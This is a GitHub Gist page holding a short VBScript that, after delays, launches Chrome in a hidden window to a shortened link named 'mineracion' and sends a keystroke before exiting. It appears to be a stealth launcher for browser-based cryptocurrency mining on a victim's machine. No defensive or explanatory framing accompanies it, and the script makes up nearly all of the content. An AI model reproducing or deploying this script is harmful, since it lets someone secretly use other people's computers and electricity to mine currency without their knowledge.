Created
January 13, 2018 06:03
-
-
Save h4kun4matata/e9d2435d11a9b370ae3a12530781a0c6 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Dim WShell | |
| Set WShell = CreateObject("WScript.Shell") | |
| Wscript.Sleep 1000 | |
| Set objShell = WScript.CreateObject("WScript.Shell") | |
| Set wshshell = WScript.CreateObject("WScript.Shell") | |
| Wscript.Sleep 10000 | |
| wshshell.run """chrome.exe""http://bit.ly/mineracion",0,False | |
| Wscript.Sleep 5000 | |
| objShell.SendKeys " " | |
| Set wshshell = Nothing | |
| wscript.quit |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment